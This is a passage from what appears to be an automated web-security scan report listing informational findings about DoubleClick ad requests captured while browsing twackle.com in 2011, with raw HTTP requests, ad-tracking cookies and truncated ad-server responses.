</script><iframe src="http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBW6JpPn1TduwPMLhlQeAz9T8CI6foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgC9vHKCagDAegDiALoA7UI9QMAAADEgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtz4tI2Frd2NdbvP7qLYxWMh5UNfCQ%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.56512;rtbip=64.74.116.145;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAcyVnuwNkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
aRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAcyVnuwNkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=http://clk.atdmt.com/MON/go/285072717/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/MON/view/285072717/direct/01/" /></a></noscript></iframe><img src="http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX5pAAPGFsK5XDCj5UngKLpxOHkyekAUKtc6Q&r=881917266&rand=56512&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=64.74.116.145&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAcyVnuwNkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.136. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307981049&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307963618838&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307963618874&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455702892&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2Fz-the-fort-worth-four%2F&fu=0&ifi=1&dtd=60&xpc=LqeKagATrE&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/fansided/General_Twackle_Widget%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.csnbayarea.com%26adT%3DWarriors%2BPlayers%26gl%3DUS&usg=AFQjCNENRhRxxAde0N7qRXJ7-_9wY5NfRg

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307981049&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307963618838&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307963618874&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455702892&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2Fz-the-fort-worth-four%2F&fu=0&ifi=1&dtd=60&xpc=LqeKagATrE&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.137. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983552&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550603&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965550274&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1769&xpc=BI0lTBVKdK&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3DLocalXpress.com%26adT%3DCheap%2BHigh%2BSpeed%2BInternet%26gl%3DUS&usg=AFQjCNHuwKyZM41KlIBWCHHsXyCKUMJH-g

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983552&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550603&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965550274&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1769&xpc=BI0lTBVKdK&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.138. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307985085&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967085713&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307967085746&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=642594083&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=100&xpc=N5SVoT1E8o&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQBFGbOqw3hcx_ayDGovBdy9w_vVNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAUg8BAgUCAQQAAAAABx_FrQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307967088%29%3Buf%28%27r%27%2C+390217%2C+1307967088%29%3B&cnd=!hB1XGwjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX-cAAFiLQK5XIkjoR6cIbWCXQFUCP72fmCbQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzfsIcP71TbSRFqTklQfw9JH0CNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCrBvAAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtz18dcVukCne8BIIe7MY6bdHGvlJQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307985085&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967085713&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307967085746&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=642594083&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=100&xpc=N5SVoT1E8o&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:11:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 1618
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 12:11:28 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQBFGbOqw3hcx_ayDGovBdy9w_vVNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAUg8BAgUCAQQAAAAABx_FrQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307967088%29%3Buf%28%27r%27%2C+390217%2C+1307967088%29%3B&cnd=!hB1XGwjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX-cAAFiLQK5XIkjoR6cIbWCXQFUCP72fmCbQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzfsIcP71TbSRFqTklQfw9JH0CNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCrBvAAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtz18dcVukCne8BIIe7MY6bdHGvlJQ%26client%3Dca-pub-7494156027018342%26adurl%3D"></script>
...[SNIP]...

18.139. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307981999&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963999622&bpp=16&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307963998240&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895142&fu=0&ifi=2&dtd=25&xpc=4An5jlXoOO&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-12?mpt=1182167233&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBC8CY3PP1TbqHGMPilQeay8nGCdaooYACzvj7-xiemNXWTMDqkgMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaARdodHRwOi8vd3d3LnR3YWNrbGUuY29tL-ABArgCGMACBcgC6JrhCqgDAdED4Mvbl_AJCmHoA4gC6AO1COgD6QfoA7oI6AOCAvUDAAAAxA%2526num%253D1%2526sig%253DAGiWqtyesmEogo7AuhIHfueUHf6RZzcr2w%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dconstantcontact.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFj5swzZ743iyIZ7mSv-g8qNDl1BQ

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307981999&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963999622&bpp=16&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307963998240&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895142&fu=0&ifi=2&dtd=25&xpc=4An5jlXoOO&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 2182
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:20 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-2056-12?mpt=1182167233&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBC8CY3PP1TbqHGMPilQeay8nGCdaooYACzvj7-xiemNXWTMDqkgMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaARdodHRwOi8vd3d3LnR3YWNrbGUuY29tL-ABArgCGMACBcgC6JrhCqgDAdED4Mvbl_AJCmHoA4gC6AO1COgD6QfoA7oI6AOCAvUDAAAAxA%2526num%253D1%2526sig%253DAGiWqtyesmEogo7AuhIHfueUHf6RZzcr2w%2526client%253Dca-pub-7494156027018342%2526adurl%253D">
</script>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dconstantcontact.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFj5swzZ743iyIZ7mSv-g8qNDl1BQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.140. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003305&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964003248&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=3&dtd=12&xpc=7SXqZNuALm&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://480-valueclick-view.c3metrics.com/v.js?id=valueclick&cid=480&t=72
http://view.atdmt.com/TLC/jview/256163696/direct/01/733392297?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw%26client%3Dca-pub-7494156027018342%26adurl%3D
http://view.atdmt.com/TLC/view/256163696/direct/01/http:/adclick.g.doubleclick.net/aclk?sa=l&ai=B-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw&client=ca-pub-7494156027018342&adurl=

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003305&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964003248&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=3&dtd=12&xpc=7SXqZNuALm&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 2184
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:38 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/256163696/direct/01/733392297?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw%26client%3Dca-pub-7494156027018342%26adurl%3D">
</script>
...[SNIP]...
aGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw&client=ca-pub-7494156027018342&adurl=http://clk.atdmt.com/TLC/go/256163696/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/256163696/direct/01/http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw&client=ca-pub-7494156027018342&adurl=" /></a></noscript>
<script type="text/javascript" src="http://480-valueclick-view.c3metrics.com/v.js?id=valueclick&cid=480&t=72"></script>
...[SNIP]...

18.141. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307983860&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965859921&bpp=4&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307965859956&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=412&xpc=QcXQLnEGo5&p=http%3A//www.twackle.com

The response contains the following link to another domain:

